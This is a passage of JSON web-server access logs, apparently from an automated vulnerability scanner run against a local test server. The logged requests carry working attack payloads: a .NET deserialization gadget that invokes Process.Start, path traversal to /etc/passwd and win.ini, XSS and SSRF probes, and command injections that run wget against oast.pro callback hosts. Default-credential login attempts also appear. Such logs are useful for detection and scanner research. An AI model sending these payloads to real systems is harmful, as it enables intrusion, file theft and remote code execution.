c2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.121","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca28bc0smpvbbtig07h04ic5zsbtyexm7.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca28bc0smpvbbtig07h0c1818p6gek66w.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca28bc0smpvbbtig07h0nz54ncjyjf15u.oast.pro%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca28bc0smpvbbtig07h09zss949yrx1dd.oast.pro%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://ca28bc0smpvbbtig07h0xwn3or3yk3euf.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca28bc0smpvbbtig07h0awawogfuk7esx.oast.pro%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml 